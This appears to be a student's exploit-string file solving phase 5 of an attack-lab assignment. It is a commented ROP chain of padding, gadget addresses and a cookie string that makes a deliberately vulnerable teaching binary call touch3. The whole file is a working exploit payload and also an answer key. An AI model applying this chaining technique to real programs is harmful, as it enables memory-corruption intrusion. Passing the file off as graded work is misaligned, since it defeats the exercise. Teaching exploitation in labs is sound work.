/* Phase 5: ROP攻击调用touch3(cookie_string) */
/* cookie: 0x1c2a3245 -> "1c2a3245" */
/* touch3地址: 0x401d19 */
/* 使用8个gadget + add_xy函数 */
/* 缓冲区大小: 24字节 (0x18) */
00 00 00 00 00 00 00 00  /* 8 bytes padding */
00 00 00 00 00 00 00 00  /* 8 bytes padding */
00 00 00 00 00 00 00 00  /* 8 bytes padding (共24字节) */
4f 1e 40 00 00 00 00 00  /* gadget1: movq %rsp, %rax; ret @ 0x401e4f */
e1 1d 40 00 00 00 00 00  /* gadget2: movq %rax, %rdi; ret @ 0x401de1 */
ef 1d 40 00 00 00 00 00  /* gadget3: popq %rax; nop; ret @ 0x401def */
48 00 00 00 00 00 00 00  /* 偏移量: 0x48 (cookie字符串相对于gadget1执行时rsp的偏移) */
63 1e 40 00 00 00 00 00  /* gadget4: movl %eax, %edx; xchg %eax,%ecx; ret @ 0x401e63 */
00 1e 40 00 00 00 00 00  /* gadget5: movl %edx, %ecx; nop; ret @ 0x401e00 */
14 1e 40 00 00 00 00 00  /* gadget6: movl %ecx, %esi; xchg %eax,%ecx; nop; ret @ 0x401e14 */
f9 1d 40 00 00 00 00 00  /* gadget7: lea (%rdi,%rsi,1), %rax; ret @ 0x401df9 (add_xy) */
e1 1d 40 00 00 00 00 00  /* gadget8: movq %rax, %rdi; ret @ 0x401de1 */
19 1d 40 00 00 00 00 00  /* touch3地址: 0x401d19 */
31 63 32 61 33 32 34 35  /* cookie字符串 "1c2a3245" */
00                       /* null终止符 */
